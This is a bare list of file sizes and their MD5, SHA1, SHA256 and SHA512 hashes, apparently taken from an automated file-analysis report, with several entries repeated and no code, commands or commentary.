MD5b2c333aa1ab8da42456c4c20bfcdd9bb
SHA108187aa64176ece430e15b9ad77a1951858134f3
SHA2567364cbedc168df8d4cafaf5d4a5ff78f6797ebd435e54251397481dadf39fb5e
SHA512d73b8ce7d33a12b0f61fa50b137e266bceac26250a695e032cbbbc0db4e6f8f95c9d31411f9df6bb64761908c9a14082ca497436285720e89c95d2bd5438fe3b
-
Filesize
185KB
MD50a239e042751c601386241a6ef11d6c7
SHA14b978ad87b8567e12fa53a102daf3816b2d9619b
SHA2565c0b1059673be5214149ab983e8a08909866f7a6f544fe916928a56a246631b2
SHA512b2f72ac8d9283cf2924769292f1f4bc7612df227d70067aa56677ee9b5196ba97bb77ecf24d31800a4a3cdf238261e325c909f50db4a2120532b87c0c02c0297
-
Filesize
185KB
MD50a239e042751c601386241a6ef11d6c7
SHA14b978ad87b8567e12fa53a102daf3816b2d9619b
SHA2565c0b1059673be5214149ab983e8a08909866f7a6f544fe916928a56a246631b2
SHA512b2f72ac8d9283cf2924769292f1f4bc7612df227d70067aa56677ee9b5196ba97bb77ecf24d31800a4a3cdf238261e325c909f50db4a2120532b87c0c02c0297
-
Filesize
145KB
MD5ea5d176572fc7ddf7ba0aa1447c10581
SHA1c6d94aa8b8748712959e53eada3d95e374bb290e
SHA2566349de3a2fb992acee014ba2fb4d57fe2df64cb71810893eb7229f233236ca60
SHA512ee53276dc3a1545276069226ea943802d3d7fc2da217580f5b2da40c49826674713f63e1bbd07b9c58a2fe696cba822906baf7cb09ae1d6e15da42d7c4a1c50e
-
Filesize
145KB
MD5ea5d176572fc7ddf7ba0aa1447c10581
SHA1c6d94aa8b8748712959e53eada3d95e374bb290e
SHA2566349de3a2fb992acee014ba2fb4d57fe2df64cb71810893eb7229f233236ca60
SHA512ee53276dc3a1545276069226ea943802d3d7fc2da217580f5b2da40c49826674713f63e1bbd07b9c58a2fe696cba822906baf7cb09ae1d6e15da42d7c4a1c50e
-
Filesize
3.9MB
MD502569a7a91a71133d4a1023bf32aa6f4
SHA10f16bcb3f3f085d3d3be912195558e9f9680d574
SHA2568d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0
SHA512534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322
-
Filesize
3.9MB
MD502569a7a91a71133d4a1023bf32aa6f4
SHA10f16bcb3f3f085d3d3be912195558e9f9680d574
SHA2568d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0
SHA512534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322
-
Filesize
3.9MB
MD502569a7a91a71133d4a1023bf32aa6f4
SHA10f16bcb3f3f085d3d3be912195558e9f9680d574
SHA2568d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0
SHA512534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322
-
Filesize
89KB
MD573c0c85e39b9a63b42f6c4ff6d634f8b
SHA1efb047b4177ad78268f6fc8bf959f58f1123eb51
SHA256477252e3531300fe2a21a679fba3664803179e91a1a4d5dd44080dbd41126368
SHA512ca32507717c2c099d54a5473fb062083237f7fda9c076e9a957b70072f41a78eedf9244b50862b81d00374297e3795021ad6db943c8408da50b1da8b5ed4a643
-
Filesize
89KB
MD573c0c85e39b9a63b42f6c4ff6d634f8b
SHA1efb047b4177ad78268f6fc8bf959f58f1123eb51
SHA256477252e3531300fe2a21a679fba3664803179e91a1a4d5dd44080dbd41126368
SHA512ca32507717c2c099d54a5473fb062083237f7fda9c076e9a957b70072f41a78eedf9244b50862b81d00374297e3795021ad6db943c8408da50b1da8b5ed4a643
-
Filesize
89KB
MD573c0c85e39b9a63b42f6c4ff6d634f8b
SHA1efb047b4177ad78268f6fc8bf959f58f1123eb51
SHA256477252e3531300fe2a21a679fba3664803179e91a1a4d5dd44080dbd41126368
SHA512ca32507717c2c099d54a5473fb062083237f7fda9c076e9a957b70072f41a78eedf9244b50862b81d00374297e3795021ad6db943c8408da50b1da8b5ed4a643
-
Filesize
162B
MD51b7c22a214949975556626d7217e9a39
SHA1d01c97e2944166ed23e47e4a62ff471ab8fa031f
SHA256340c8464c2007ce3f80682e15dfafa4180b641d53c14201b929906b7b0284d87
SHA512ba64847cf1d4157d50abe4f4a1e5c1996fe387c5808e2f758c7fb3213bfefe1f3712d343f0c30a16819749840954654a70611d2250fd0f7b032429db7afd2cc5